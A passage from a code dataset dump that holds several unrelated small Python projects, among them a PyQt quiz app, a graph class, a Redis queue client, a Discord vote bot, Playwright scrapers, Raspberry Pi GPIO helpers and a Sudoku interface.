self.hide()\n\n if auth_dialog.exec_() == QDialog.Accepted:\n self.__welcome_text()\n self.show()\n\n def show_reg(self):\n auth_dialog = Auth(False, 'Регистрация пользователя')\n auth_dialog.show()\n self.hide()\n\n if auth_dialog.exec_() == QDialog.Accepted:\n self.__welcome_text()\n self.show()\n\n def __welcome_text(self):\n if not MainWindow.user[0] is None:\n self.welcome_user.setText(f'Здравствуйте, {MainWindow.user[1]}')\n self.radioButton_1.show()\n self.radioButton_2.show()\n self.radioButton_3.show()\n else:\n self.welcome_user.setText(f'Здравствуйте, пожалуйста авторизируйтесь')\n self.radioButton_1.hide()\n self.radioButton_2.hide()\n self.radioButton_3.hide()\n\n def __get_sql_request(self):\n choise_filters = list()\n if self.comboBox_section.currentText() != 'Все темы':\n choise_filters.append(f'section_id = {self.comboBox_section.currentText().split()[0]}')\n if not (MainWindow.user[2] is None or self.radioButton_1.isChecked()):\n conn = sqlite3.connect('QT_project')\n cur = conn.cursor()\n temp = ', '.join(str(i[0])\n for i in cur.execute(\n f\"\"\"\n SELECT task_id \n FROM user_decision \n WHERE user_id = {MainWindow.user[2]} AND complited = 1\n \"\"\").fetchall())\n if self.radioButton_2.isChecked():\n choise_filters.append(f\"\"\"id not in ({temp})\"\"\")\n else:\n choise_filters.append(f\"\"\"id in ({temp})\"\"\")\n conn.close()\n\n sql_request = f\"\"\"SELECT id, title \n FROM task \n {('WHERE ' + ' AND '.join(choise_filters)) if choise_filters else ''}\n ORDER BY id\"\"\"\n return sql_request\n\n def __get_last_autauthentication(self):\n with open('log.txt', 'r', encoding='UTF-8') as log:\n user = log.read().strip().split()\n if user[0] != 'None':\n MainWindow.user = tuple(user)\n self.__welcome_text()\n\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n ex = MainWindow()\n ex.show()\n sys.exit(app.exec())","repo_name":"kocheshkovdmitriy/PyQT_project","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":14201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74214239207","text":"from asyncio.windows_events import NULL\nfrom matriz import Matriz \nfrom vertice import Vertice\nfrom utils import *\n\nclass Grafo:\n def __init__(self, max_vertices, ponderado, direcionado):\n self._vertices = []\n \n self._estrutura = Matriz(\"Matriz de Adjacência\", max_vertices, max_vertices)\n if(ponderado):\n self._estrutura_pesos = Matriz(\"Matriz de Pesos\", max_vertices, max_vertices)\n\n self._max_vertices = max_vertices\n self._qnt_atual_vertices = 0\n self._ponderado = ponderado\n self._direcionado = direcionado\n\n def add_vertice(self, rotulo):\n if self.existe_vertice(rotulo) == False:\n if(self._qnt_atual_vertices < self._max_vertices):\n v = Vertice(rotulo)\n self._vertices.append(v)\n self._qnt_atual_vertices += 1\n else:\n print(\"Quantidade máxima de vértices já inserida\")\n espera_clique()\n else:\n print(\"Vertice já inserido no grafo!\")\n espera_clique()\n \n def log(self):\n tipo_grafo_ponderacao = \"ponderado\" if self._ponderado else \"não ponderado\"\n tipo_grafo_direcao = \"direcionado\" if self._direcionado else \"nao direcionado\"\n \n print(f\"Tipo de grafo: {tipo_grafo_direcao} e {tipo_grafo_ponderacao}\")\n print(f\"Quantidade máxima de vértices: {self._max_vertices}\")\n print(f\"Quantidade atual de vertices: {len(self._vertices)}\")\n\n self.mostra_lista_vertices()\n self._estrutura.display()\n if(self._ponderado):\n self._estrutura_pesos.display()\n \n def conecta(self, rotulo_v1, rotulo_v2):\n indice_v1 = self.get_indice(rotulo_v1)\n indice_v2 = self.get_indice(rotulo_v2)\n peso = 0\n if indice_v1 > -1 and indice_v2 > -1:# validacao da conexao\n if(self._ponderado):\n print(\"Insira o peso da aresta\", end=\": \")\n peso = int(input())\n self._estrutura_pesos.add_aresta(indice_v1, indice_v2, self._ponderado, peso)\n \n self._estrutura.add_aresta(indice_v1, indice_v2, self._direcionado)\n if(self._direcionado):\n self._vertices[indice_v1].update_grau_saida()\n self._vertices[indice_v2].update_grau_incidencia()\n else:\n self._vertices[indice_v1].update_grau()\n self._vertices[indice_v2].update_grau()\n else:\n print(\"ATENÇÂO -> algum dos rótulos inseridos não está presente no seu grafo\")\n \n def _get_adjacencias(self, rotulo):\n indice = self.get_indice(rotulo)\n if(indice!= -1):\n adjacencias_raw = self._estrutura.get_adjacencias(indice)\n adjacencias = []\n for i in range(len(adjacencias_raw)): \n if adjacencias_raw[i] == 1:\n adjacencias.append(self._vertices[i])\n return adjacencias\n return []\n \n \n def mostra_adjacencias(self, rotulo):\n indice = self.get_indice(rotulo)\n if(indice != -1):\n adjacencias = self._get_adjacencias(rotulo)\n \n print(f\"Vértices adjacentes ao vértice {rotulo}:\")\n print(\"[\", end=\"\")\n for i in range(len(adjacencias)):\n print(adjacencias[i].rotulo, end = \"\")\n print(\"\"if i == self._qnt_atual_vertices - 1 else \",\", end = \"\")\n print(\"]\")\n espera_clique() \n else: \n print(\"Vértice não existente!\");\n espera_clique()\n\n \n def get_indice(self, rotulo):\n result = 0\n for i in range(len(self._vertices)):\n if self._vertices[i].rotulo == rotulo:\n return result\n result += 1 \n return -1 # nao encontrou o vertice\n \n def existe_vertice(self,rotulo):\n return self.get_indice(rotulo) != -1\n\n def mostra_lista_vertices(self):\n print(\"Vertices presentes no seu grafo:\\n[\")\n \n for i in range(self._qnt_atual_vertices):\n print(self._vertices[i].to_string())\n print(\"]\") ","repo_name":"gumartinslopes/College","sub_path":"4thSemester/Grafos/implementacaoPython/grafo.py","file_name":"grafo.py","file_ext":"py","file_size_in_byte":4213,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"73516070568","text":"from pattern import parse_str, parse_stmt_str, parse_expr_str\nfrom instance import try_create_instance\nfrom constant_assignment import VariableMap\nfrom type_assignment import TypeAssignment\nfrom codelet_generator import generate_codelet_var_ints\nfrom populator import PopulateParameters, populate_stmt, populate_expr\nfrom random import randint, seed\nfrom pathlib import Path\n\nn_exprs = 9\nn_iterations = 10\n\ntypes = TypeAssignment(default_types=['int'])\ntypes.set('A', 'double')\ntypes.set('B1', 'double')\ntypes.set('B2', 'double')\ntypes.set('B3', 'double')\ntypes.set('B4', 'double')\ntypes.set('B5', 'double')\ntypes.set('B6', 'double')\ntypes.set('B7', 'double')\ntypes.set('B8', 'double')\ntypes.set('B9', 'double')\n\ninit_value_map = {\n 'I': '32000',\n 'A': 'drand(0.0, 1.0)',\n 'B1': 'drand(0.0, 1.0)',\n 'B2': 'drand(0.0, 1.0)',\n 'B3': 'drand(0.0, 1.0)',\n 'B3': 'drand(0.0, 1.0)',\n 'B4': 'drand(0.0, 1.0)',\n 'B5': 'drand(0.0, 1.0)',\n 'B6': 'drand(0.0, 1.0)',\n 'B7': 'drand(0.0, 1.0)',\n 'B8': 'drand(0.0, 1.0)',\n 'B9': 'drand(0.0, 1.0)',\n}\n\ndst_dir = 'output'\nPath(dst_dir).mkdir(parents=True, exist_ok=True)\n\nloop_code = \"\"\"\ndeclare I;\ndeclare A[];\ndeclare B1[];\ndeclare B2[];\ndeclare B3[];\ndeclare B4[];\ndeclare B5[];\ndeclare B6[];\ndeclare B7[];\ndeclare B8[];\ndeclare B9[];\n\nfor [(i, >=0, <=I-1)] {\n A[i] = (#_# * #_# + #_#) + (#_# * #_# + #_#) + (#_# * #_# + #_#);\n}\n\"\"\"\n\nskeleton = parse_str(loop_code)\n\ndef populate_exprs(skeleton, n_vars):\n indices = [i for i in range(1, n_vars+1)]\n for i in range(n_exprs - n_vars):\n indices.append(randint(1, n_vars))\n exprs = [parse_expr_str(f'B{i}[i]') for i in indices]\n for e in exprs:\n p = PopulateParameters(exprs, is_finite=True)\n return populate_expr(skeleton, p.populate)\n\ndef gen(skeleton, n_vars):\n program = populate_exprs(skeleton.clone(), n_vars)\n var_map = VariableMap(0, 32000)\n var_map.set_value('I', 32000)\n instance = try_create_instance(program, var_map, types)\n print(instance.pprint())\n batch = 'vec_1_stmt'\n name = f'vec_{n_vars}_loads'\n code = f'{name}.c'\n codelet = f'{code}_de'\n generate_codelet_var_ints('LoopGen', batch, code, codelet,\n n_iterations, [32000], instance, init_value_map)\n\nseed(0)\nfor n_vars in range(1, n_exprs+1):\n gen(skeleton.clone(), n_vars)\n\n","repo_name":"amchiclet/compiler-evaluation-experiments","sub_path":"code-generation-scripts/vec-programs.py","file_name":"vec-programs.py","file_ext":"py","file_size_in_byte":2354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16410343627","text":"import multiprocessing\n\n# 绑定端口号\nbind = '127.0.0.1:8000' # 负载均衡需要改为本机ip\n\n# 工作进程数\nworkers = multiprocessing.cpu_count() * 2 + 1\n\n# 每个进程数线程数\n# threads = multiprocessing.cpu_count() * 2 + 1\n\ntimeout = 30\ndaemon = False\n\n# 日志级别\nloglevel = 'debug' # 错误日志级别\n# access_log_format = '%(t)s %(p)s %(h)s %({X-Forwarded-For}i)s \"%(r)s\" %(s)s %(L)s %(b)s %(f)s\" \"%(a)s\"'\naccesslog = '/local/logs/gunicorn.acc.log'\nerrorlog = '/local/logs/gunicorn.err.log' # '-' 输出到屏幕方式\ncapture_output = True # 把标准输出和标准错误重定向到日志文件中\n\npidfile = '/tmp/gunicorn.pid'\n","repo_name":"JustThresh/OnlinePercy","sub_path":"percy/gunicorn_conf.py","file_name":"gunicorn_conf.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"73246588648","text":"import math\nimport time\nfrom urllib.parse import urlparse\n\nimport redis\n\n\nclass Client(object):\n def __init__(self, conn_string):\n \"\"\"\n A Redis-based ``Client``.\n\n Args:\n conn_string (str): The DSN. The host/port/db are parsed out of it.\n Should be of the format ``redis://host:port/db``\n \"\"\"\n self.conn_string = conn_string\n bits = urlparse(self.conn_string)\n self.conn = self.get_connection(\n host=bits.hostname,\n port=bits.port,\n db=bits.path.lstrip(\"/\").split(\"/\")[0],\n )\n\n def get_connection(self, host, port, db):\n \"\"\"\n Returns a ``StrictRedis`` connection instance.\n \"\"\"\n return redis.StrictRedis(\n host=host, port=port, db=db, decode_responses=True\n )\n\n def len(self, queue_name):\n \"\"\"\n Returns the length of the queue.\n\n Args:\n queue_name (str): The name of the queue. Usually handled by the\n `Gator`` instance.\n\n Returns:\n int: The length of the queue\n \"\"\"\n return self.conn.zcard(queue_name)\n\n def drop_all(self, queue_name):\n \"\"\"\n Drops all the task in the queue.\n\n Args:\n queue_name (str): The name of the queue. Usually handled by the\n ``Gator`` instance.\n \"\"\"\n task_ids = self.conn.zrange(queue_name, 0, -1)\n\n for task_id in task_ids:\n self.conn.delete(task_id)\n\n self.conn.delete(queue_name)\n\n def push(self, queue_name, task_id, data, delay_until=None):\n \"\"\"\n Pushes a task onto the queue.\n\n Args:\n queue_name (str): The name of the queue. Usually handled by the\n ``Gator`` instance.\n task_id (str): The identifier of the task.\n data (str): The relevant data for the task.\n delay_until (float): Optional. The Unix timestamp to delay\n processing of the task until. Default is `None`.\n\n Returns:\n str: The task ID.\n \"\"\"\n if delay_until is None:\n delay_until = math.ceil(time.time())\n\n self.conn.zadd(queue_name, {task_id: delay_until}, nx=True)\n self.conn.set(task_id, data)\n return task_id\n\n def pop(self, queue_name):\n \"\"\"\n Pops a task off the queue.\n\n Args:\n queue_name (str): The name of the queue. Usually handled by the\n ``Gator`` instance.\n\n Returns:\n str: The data for the task.\n \"\"\"\n now = math.floor(time.time())\n available_to_pop = self.conn.zrangebyscore(\n queue_name, 0, now, start=0, num=1\n )\n\n if not len(available_to_pop):\n return None\n\n popped = self.conn.zpopmin(queue_name)\n task_id, delay_until = popped[0][0], popped[0][1]\n data = self.conn.get(task_id)\n self.conn.delete(task_id)\n return data\n\n def get(self, queue_name, task_id):\n \"\"\"\n Pops a specific task off the queue by identifier.\n\n Args:\n queue_name (str): The name of the queue. Usually handled by the\n ``Gator`` instance.\n task_id (str): The identifier of the task.\n\n Returns:\n str: The data for the task.\n \"\"\"\n self.conn.zrem(queue_name, task_id)\n data = self.conn.get(task_id)\n\n if data:\n self.conn.delete(task_id)\n return data\n","repo_name":"toastdriven/alligator","sub_path":"alligator/backends/redis_backend.py","file_name":"redis_backend.py","file_ext":"py","file_size_in_byte":3515,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"53"} +{"seq_id":"72421668647","text":"def isValid(strs):\n\n brackets = {\n '(': 1, ')': -1,\n '[': 2, ']': -2,\n '{': 3, '}': -3\n }\n\n temp = []\n\n if strs == '':\n return True\n\n for i in strs:\n value = brackets.get(i)\n\n if value is None:\n return False\n\n if value > 0:\n temp.append(value)\n else:\n\n if not temp:\n return False\n\n if value + temp[-1] != 0:\n return False\n\n temp.pop()\n return False if temp else True\n'''\nbrackets_pair = {')': '(', ']': '[', '}': '{'}\nleft_bkt = ['(', '{', '[']\n\n\ndef isValid(s):\n\n stack = []\n\n for i in s:\n if i in left_bkt:\n stack.append(i)\n elif i in right_bkt:\n if not stack or stack[-1] != brackets_pair[i]:\n return False\n stack.pop()\n else:\n return False\n return False if not stack else True\n\n'''\na = isValid('()')\nprint(a)\n","repo_name":"danielliu000/MyPythonLearning","sub_path":"20_Valid_Parentheses.py","file_name":"20_Valid_Parentheses.py","file_ext":"py","file_size_in_byte":977,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27382848253","text":"import random\n\nnumber_pool = range(1,6)\nsecret_number = random.choice(number_pool)\nguess_count = 0\nguess_limit = 3\n\nwhile guess_count < guess_limit:\n guess = int(input('Guess the number between 1 and 5: '))\n guess_count += 1\n if guess == secret_number:\n print('You got it!')\n break\nelse:\n print(f'Sorry, the number was {secret_number}. Try again :(')\n","repo_name":"tronplex/Python-numberguess","sub_path":"guessNumber.py","file_name":"guessNumber.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38848284677","text":"import discord\r\nfrom ColdOneCore import CoreColors\r\nfrom VoteBase import VoteBase\r\n\r\nclass Vote(VoteBase):\r\n\r\n activeVotes = {}\r\n\r\n # Checks if a user already has a vote going\r\n @staticmethod\r\n def doesUserVoteExist(author):\r\n return author in Vote.activeVotes\r\n\r\n # Removes and returns a user's bet\r\n @staticmethod\r\n def popVote(author):\r\n vote = Vote.activeVotes[author]\r\n del Vote.activeVotes[author]\r\n return vote\r\n\r\n # Creates a vote and sends its embed\r\n @staticmethod\r\n async def createVote(ctx, author, message):\r\n if (not author) or (not message):\r\n return\r\n vote = Vote(author=author, description=message)\r\n await vote.sendEmbed(ctx)\r\n\r\n @staticmethod\r\n async def closeVote(ctx, vote):\r\n if not vote:\r\n return\r\n await vote._closeVote(ctx)\r\n\r\n def __init__(self, author, description):\r\n self.author = author\r\n self.voteDesc = description\r\n super().__init__(title=description, author=author, color=CoreColors.InteractColor)\r\n Vote.activeVotes.update({self.author:self})\r\n\r\n async def _closeVote(self, ctx):\r\n tally = await self.countVote()\r\n await self.clearEmbed()\r\n await self.getCloseEmbed(ctx, tally)\r\n\r\n async def getCloseEmbed(self, ctx, tally):\r\n ayesHaveIt = len(tally.get('voteFor')) - len(tally.get('voteAgainst'))\r\n super().setTitle(\"Vote over: \" + self.voteDesc)\r\n if ayesHaveIt > 0:\r\n super().setDescription(\"Ayes have it!\")\r\n elif ayesHaveIt < 0:\r\n super().setDescription(\"Nays have it!\")\r\n else:\r\n super().setDescription(\"The vote's a tie!\")\r\n await self.sendEmbed(ctx, True)\r\n","repo_name":"t4h3d1f/ColdOneBot","sub_path":"Vote.py","file_name":"Vote.py","file_ext":"py","file_size_in_byte":1754,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"43446917624","text":"# encoding:utf-8\nimport web\nimport datetime\nimport db\nimport json\n\nurls = (\n '/','Index',\n '/day/(.+)', 'Day',\n '/status', 'Status',\n)\napp = web.application(urls, globals())\n\nDB = db.DB()\n\nclass Index:\n def GET(self):\n today = datetime.datetime.today()\n day = today.strftime(\"%Y-%m-%d\")\n raise web.seeother('/day/%s' % day)\n\nclass Day:\n def GET(self, day):\n web.header('Content-Type', 'application/json')\n data = DB.getDay(day)\n result = []\n for one in data:\n result.append({\"id\":one[0], \"temperature\":one[1], \"humidity\":one[2], \"time\":one[3]})\n return json.dumps(result)\n\nclass Status:\n def GET(self):\n return '

    Server running...

    '\n\nif __name__ == \"__main__\":\n app.run()\n","repo_name":"bluebanboom/thserver","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42758186116","text":"from django.conf.urls import include\nfrom django.urls import path\nfrom post.views import *\n\nurlpatterns = [\n\t\tpath('', anasayfa),\n\t\tpath('anasayfa', anasayfa),\n\t\tpath('tum_sorular', tum_sorular, name='tum_sorular'),\n\t\tpath('cevapsizlar', cevapsizlar),\n\t\tpath('en_yeniler', en_yeniler),\n\t\tpath('/', post_detail, name='detail'),\n\t\tpath('/comment', add_comment_to_post, name='add_comment_to_post'),\n\t\tpath('comment//approve', comment_approve, name='comment_approve'),\n\t\tpath('comment//remove', comment_remove, name='comment_remove'),\n\t\tpath('soru_sor', soru_sor),\n\t\tpath('kayit', kayit),\n\t\tpath('iletisim', iletisim),\n\t\tpath('', include('django.contrib.auth.urls')),\n]\n\n\n","repo_name":"busradogann/soru_cevap_platformu","sub_path":"post/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11032581715","text":"from math import *\nimport numpy as np\nimport phys_const_cgs as const\nimport units_cgs as units\nfrom routines import *\nfrom LambdaOp import *\nfrom Geometry import *\n\nclass Detector:\n def __init__(self, size_pix, distance_kpc, FOV_mas):\n self.size_pix = size_pix\n self.distance_kpc = distance_kpc\n self.FOV_mas = FOV_mas\n\n def get_image(self, grid, wavelength_um, orient):\n\n def coincide(p1, p2):\n return dist3d(p1, p2)<1.0e3\n\n def order_points(inter_outer_):\n if inter_outer_[0][2] < inter_outer_[1][2]:\n inter_outer = inter_outer_\n else:\n inter_outer = (inter_outer_[1], inter_outer_[0])\n return inter_outer\n\n\n R_inner = grid.r_grid[0]\n R_outer = grid.r_grid[-1]\n halfLen = 0.5*(grid.z_grid[-1]-grid.z_grid[0])\n\n H = self.size_pix\n center = H/2.0\n pixel_scale = self.FOV_mas / H\n print('Pixel_scale:', pixel_scale)\n pixel_AU = pixel_scale * self.distance_kpc * const.AU\n\n op = LambdaOp(wavelength_um, grid)\n direct = orient.rotate( np.array([0,0,-1]) )\n dtau = 0.1\n ntau = 20\n tau_grid = []\n tau = 0\n for i in range(ntau):\n tau_grid.append(tau)\n tau += dtau\n\n IMG = np.zeros((H,H))\n for i in range(H):\n for j in range(H):\n IMG[i,j] = 0.0\n sky_X = (i - center)*pixel_AU\n sky_Y = (j - center)*pixel_AU\n X_local = orient.rotate(np.array([sky_X, sky_Y, 0]) )\n ray = Ray(X_local, direct)\n inter_outer_ = Geometry.intersect_cylinder(ray, R_outer, halfLen)\n inter_inner_ = Geometry.intersect_cylinder(ray, R_inner, halfLen)\n if inter_outer_==None: continue\n\n inter_outer = order_points(inter_outer_)\n\n\n if inter_inner_ == None:\n entry = inter_outer[1]\n else:\n inter_inner = order_points(inter_inner_)\n if coincide(inter_outer[0], inter_inner[0]) and coincide(inter_outer[1], inter_inner[1]):\n continue\n else:\n if inter_inner[0][2]>inter_outer[0][2]:\n entry = inter_inner[0]\n if inter_inner[1][2] v_scale:\n width = r_width\n height = int(width * v_scale)\n x = 0\n y = (r_height - height) / 3\n else:\n height = r_height\n width = int(height * v_scale)\n x = (r_width - width) / 2\n y = 0\n box = (x, y, x + width, y + height)\n new_img = img.crop(box)\n if save_path:\n new_img.save(save_path)\n return save_path\n else:\n new_img.save(open_path)\n print(\"已剪切\")\n return open_path\n\n\n\n\n\n","repo_name":"wangle6318/jianshu","sub_path":"bbs/image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":1811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17652927220","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\ndef create_process_type(apps, schema_editor):\n ProcessType = apps.get_model('core', 'ProcessType')\n ProcessType.objects.get_or_create(\n type='afm',\n is_destructive=False,\n name='AFM',\n full_name='Atomic Force Microscopy',\n description='A very high-resolution scanning probe microscopy technique '\n 'to characterize surface morphology.',\n scheduling_type='none')\n\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('afm', '0001_initial'),\n ('core', '0002_create_processtypes'),\n ]\n\n operations = [\n migrations.RunPython(create_process_type),\n ]\n","repo_name":"emergence-lab/emergence-lab","sub_path":"afm/migrations/0002_create_processtype.py","file_name":"0002_create_processtype.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"23256686905","text":"from typing import List, Union\nfrom requests.compat import urljoin\nfrom bs4 import BeautifulSoup\nfrom Extensions import Extensions\nfrom playwright.sync_api import sync_playwright\n\n\nclass web_playwright(Extensions):\n def __init__(self, **kwargs):\n self.commands = {\n \"Scrape Text with Playwright\": self.scrape_text_with_playwright,\n \"Scrape Links with Playwright\": self.scrape_links_with_playwright,\n }\n\n async def scrape_text_with_playwright(self, url: str) -> str:\n with sync_playwright() as p:\n browser = p.chromium.launch()\n page = browser.new_page()\n\n try:\n page.goto(url)\n html_content = page.content()\n soup = BeautifulSoup(html_content, \"html.parser\")\n\n for script in soup([\"script\", \"style\"]):\n script.extract()\n\n text = soup.get_text()\n lines = (line.strip() for line in text.splitlines())\n chunks = (\n phrase.strip() for line in lines for phrase in line.split(\" \")\n )\n text = \"\\n\".join(chunk for chunk in chunks if chunk)\n\n except Exception as e:\n text = f\"Error: {str(e)}\"\n\n finally:\n browser.close()\n\n return text\n\n async def scrape_links_with_playwright(self, url: str) -> Union[str, List[str]]:\n with sync_playwright() as p:\n browser = p.chromium.launch()\n page = browser.new_page()\n\n try:\n page.goto(url)\n html_content = page.content()\n soup = BeautifulSoup(html_content, \"html.parser\")\n\n for script in soup([\"script\", \"style\"]):\n script.extract()\n\n hyperlinks = [\n (link.text, urljoin(url, link[\"href\"]))\n for link in soup.find_all(\"a\", href=True)\n ]\n formatted_links = [\n f\"{link_text} ({link_url})\" for link_text, link_url in hyperlinks\n ]\n\n except Exception as e:\n formatted_links = f\"Error: {str(e)}\"\n\n finally:\n browser.close()\n\n return formatted_links\n","repo_name":"Loongel/Claude_agent","sub_path":"AGiXT/agixt/extensions/web_playwright.py","file_name":"web_playwright.py","file_ext":"py","file_size_in_byte":2287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35968663823","text":"from gpiozero.pins.pigpio import PiGPIOFactory\nfrom gpiozero import Button, LED\nfrom time import sleep\nimport numpy as np\n\n\n# PI ZERO GPIO MODES MAP(0=input, 1=output, 4=ALT0)\n\n# 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15\n# 4 4 4 4 0 1 1 0 0 0 0 0 0 0 4 4\n\n# 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31\n# 1 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0\n\n\ndef connect_remote_gpio(host_ip):\n \"\"\"Connect to remote GPIO host\n :param host_ip: IP address of your raspberry pi\n :return: factory object\n \"\"\"\n factory = PiGPIOFactory(host=host_ip)\n return factory\n\n\ndef turn_led_on_off(pin, factory, blink, time_on=0.5, time_off=1):\n \"\"\"Turn on and off specific LED\n :param pin: GPIO pin number the LED is connected to\n :param factory: PiGPIOFactory Host\n :param blink: Number of times the led should blink\n :param time_on: Seconds the led should stay\n :param time_off: Seconds the led should stay\n :return: LED Blinking\n \"\"\"\n led = LED(pin, pin_factory=factory)\n\n for i in np.arange(blink):\n led.on()\n print(f\"[INFO] LED at pin {pin} turned on.\")\n sleep(time_on)\n led.off()\n print(f\"[INFO] LED at pin {pin} turned off.\")\n sleep(time_off)\n\n\ndef button_wait_for_press(pin, factory, timeout=None):\n \"\"\"Wait for button to be pressed\n :param pin: GPIO pin number the button is connected to\n :param factory: PiGPIOFactory Host\n :param timeout: Number of seconds to wait before proceeding (None = Wait indefinitely)\n :return: Pause script until button is pressed\n \"\"\"\n button = Button(pin, pin_factory=factory)\n print(f\"[INFO] Waiting for button at pin {pin} to be pressed.\")\n button.wait_for_press(timeout)\n print(f\"[INFO] The button at pin {pin} was pressed.\")\n return True\n\n\ndef button_wait_for_release(pin, factory, timeout=None):\n \"\"\"Wait for button to be released\n :param pin: GPIO pin number the button is connected to\n :param factory: PiGPIOFactory Host\n :param timeout: Number of seconds to wait before proceeding (None = Wait indefinitely)\n :return: Pause script until button is released\n \"\"\"\n button = Button(pin, pin_factory=factory)\n print(f\"Waiting for button at pin {pin} to be released.\")\n button.wait_for_press(timeout)\n print(f\"The button at pin {pin} was released.\")\n return True\n\n\ndef button_when_pressed(pin, factory):\n \"\"\"\n :param pin:\n :param factory:\n :return:\n \"\"\"\n button = Button(pin, pin_factory=factory)\n button.when_pressed()\n print(f\"[INFO] The button at pin {pin} was pressed.\")\n return True\n\n\ndef button_when_released(pin, factory):\n \"\"\"\n :param pin:\n :param factory:\n :return:\n \"\"\"\n button = Button(pin, pin_factory=factory)\n button.when_released()\n print(f\"[INFO] The button at pin {pin} was released.\")\n return True\n","repo_name":"DevGlitch/jaqen","sub_path":"blackbeard/remote_gpio/gpio_func.py","file_name":"gpio_func.py","file_ext":"py","file_size_in_byte":2870,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"75064161768","text":"import pygame\npygame.init()\n\n\nclass PlayerInteractions:\n\n BLACK = (0, 0, 0)\n RED = (255, 0, 0)\n WHITE = (255, 255, 255)\n LIGHT_GRAY = (179, 179, 179)\n\n FONT_L = pygame.font.SysFont(\"ubuntumono\", 30)\n FONT_S = pygame.font.SysFont(\"ubuntumono\", 20)\n\n keys_set = [pygame.K_KP1, pygame.K_KP2, pygame.K_KP3,\n pygame.K_KP4, pygame.K_KP5, pygame.K_KP6,\n pygame.K_KP7, pygame.K_KP8, pygame.K_KP9]\n\n def movement(self, event, x, y):\n\n number = 0\n if event.key == pygame.K_LEFT:\n if x > 0:\n x -= 1\n if event.key == pygame.K_RIGHT:\n if x < 8:\n x += 1\n if event.key == pygame.K_UP:\n if y > 0:\n y -= 1\n if event.key == pygame.K_DOWN:\n if y < 8:\n y += 1\n # If the player enters a number from the numeric keypad.\n if event.key in self.keys_set:\n number = int(event.unicode)\n # Empty the cell if it's filled.\n if event.key == pygame.K_SPACE:\n number = -1\n\n return x, y, number\n\n def display_invalid_input(self, surface, choice):\n sur_x, sur_y = 30, 580\n invalid_input = [\"- Invalid input, the value exists at the same block/ row/ column.\",\n \"- You can't change this value.\"]\n if choice == 1:\n text = self.FONT_S.render(invalid_input[0], True, self.RED)\n surface.blit(text, (sur_x, sur_y))\n elif choice == 2:\n text = self.FONT_S.render(invalid_input[1], True, self.RED)\n surface.blit(text, (sur_x, sur_y))\n\n def display_instructions(self, surface):\n sur_x, sur_y = 30, 600\n instructions = [\"- Use the keyboard arrows to move among the cells.\",\n \"- Press the spacebar ro clear the cell.\",\n \"- Enter a number form you numeric keypad.\"]\n for inst in instructions:\n text = self.FONT_S.render(inst, True, self.BLACK)\n surface.blit(text, (sur_x, sur_y))\n sur_y += 20\n\n def solve_button(self, surface):\n sur_x, sur_y = 600, 270\n\n # pygame.draw.rect(surface, self.LIGHT_GRAY, pygame.Rect(sur_x, sur_y, 110, 60))\n pygame.draw.rect(surface, self.LIGHT_GRAY, pygame.Rect(sur_x, sur_y, 150, 60))\n text = self.FONT_L.render(\"Solve\", True, self.BLACK)\n surface.blit(text, (sur_x+37, sur_y+15))\n\n def clear_button(self, surface):\n sur_x, sur_y = 600, 390\n pygame.draw.rect(surface, self.LIGHT_GRAY, pygame.Rect(sur_x, sur_y, 150, 60))\n text = self.FONT_L.render(\"Clear\", True, self.BLACK)\n surface.blit(text, (sur_x+37, sur_y+15))\n\n def new_game_button(self, surface):\n sur_x, sur_y = 600, 510\n pygame.draw.rect(surface, self.LIGHT_GRAY, pygame.Rect(sur_x, sur_y, 150, 60))\n text = self.FONT_L.render(\"New Game\", True, self.BLACK)\n surface.blit(text, (sur_x + 15, sur_y + 15))\n\n def display_endgame(self, surface, choice):\n congrats = \"Congratulations!!\"\n deadend = \"Dead End!\"\n sur_x, sur_y = 210, 680\n if choice == 1:\n text = self.FONT_L.render(congrats, True, self.RED)\n surface.blit(text, (sur_x, sur_y))\n else:\n text = self.FONT_L.render(deadend, True, self.RED)\n surface.blit(text, (sur_x, sur_y))\n","repo_name":"AmanySalah/Sudoku-Solver","sub_path":"player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":3407,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"70388799850","text":"import os\nimport hashlib\nfrom flask import Flask, render_template, request, redirect, flash, url_for\nfrom werkzeug.utils import secure_filename\nfrom time import time\nfrom recherche import *\nfrom mongo import Mongo\n\napp = Flask(__name__)\napp.secret_key = os.getenv('FLASK_KEY')\n\nmongo = Mongo()\n\ncfg = {'descriptors' : {'is_selected' : True, 